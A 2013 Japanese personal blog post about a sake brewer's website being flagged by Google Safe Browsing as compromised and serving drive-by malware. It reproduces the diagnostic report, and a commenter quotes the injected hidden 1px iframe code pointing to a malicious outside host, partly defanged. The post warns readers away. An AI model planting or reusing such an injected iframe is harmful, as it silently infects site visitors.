« 上着いらないような | トップページ | 新しいPontaカードが届きました »

中埜酒造さーん

 中埜酒造のサイトを見たかったのですが、

20130514nakanoshuzou

攻撃サイトとして報告されています!
この Web ページ (www.nakanoshuzou.jp) は攻撃サイトであると報告されており、セキュリティ設定に従いブロックされました。
攻撃サイトはあなたの個人情報を盗んだり、コンピュータを乗っ取って他のコンピュータへの攻撃に利用したり、あなたのシステムを破壊するためのプログラムをインストールしようとします。
一部の攻撃サイトでは意図的に有害なソフトウェアを配布していますが、多くの場合は運営者が知らずにまたは許可なく有害なソフトウェアの配布に不正利用されています。

ということでした。
 ふむ。


セーフ ブラウジング
診断ページ: nakanoshuzou.jp

nakanoshuzou.jp の現在の状況
 疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
 過去 90 日間に、このサイトの一部で不審な動きが 10 回検出されています。

Google がこのサイトを巡回したときの状況
 このサイトで過去 90 日間に Google がテストした 41 ページのうち 41 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。Google が最後にこのサイトを巡回したのは 2013-05-13 で、このサイトで不審なコンテンツが最後に検出されたのは 2013-05-13 です。

 不正なソフトウェアには 8 exploit(s) などがあります。
 不正なソフトウェアは 1 個のドメイン(ishigo.sytes.net/ など)でホストされています。
 このサイトは 1 個のネットワーク(AS2554 (IDC2554) など)でホストされていたことが判明しました。

不正なソフトの感染を広げる媒介をしていたかどうか
 nakanoshuzou.jp は、過去 90 日間に 4 個のサイト(t.co/, bit.ly/, rikunabi.com/ など)への感染媒体となっていた形跡があります。

サイトで不正なソフトウェアをホストしていたかどうか
 いいえ、このサイトでは過去 90 日間に不正なソフトウェアのホスティングは検出されていません。

原因
 第三者が正当なサイトに不正なコードを追加したことが原因で、警告メッセージが表示される可能性があります。

|

« 上着いらないような | トップページ | 新しいPontaカードが届きました »

「パソコン・インターネット」カテゴリの記事

コメント

改竄されているので、件のサイトには無理やりアクセスしないでください。
※どうしても見たい場合は、gw.aguse.jpを経由すれば安全です。
---
jsファイルと、403、404のエラーページなどに下記のコードが挿入されていました。
<iframe width="1px" height="1px" src="http://ishigo●sytes●net/openstat/appropriate/promise-ourselves●php" ></iframe>
※一部の文字、記号を変更してあります
誘導先はサーバーがダウンしているのか?…私のPCでは繋がらなかったのですが、Googleは何かを検知しているようです。
アップル引越センターなどもやられているので注意が必要です

投稿: 通行人 | 2013/05/14 15:30

こんばんは、通行人さま。

コメントありがとうございます。
中埜さんのサイトがどうなっているのかも教えていただき、重ねてありがとうございます。

この警告画面はときどき見かけることがあるのですが、他人様のを改ざんするのは楽しいのかなあ。

投稿: moritama | 2013/05/14 21:08

コメントを書く



(ウェブ上には掲載しません)




トラックバック

この記事のトラックバックURL:
http://app.cocolog-nifty.com/t/trackback/12628/57381528

この記事へのトラックバック一覧です: 中埜酒造さーん:

« 上着いらないような | トップページ | 新しいPontaカードが届きました »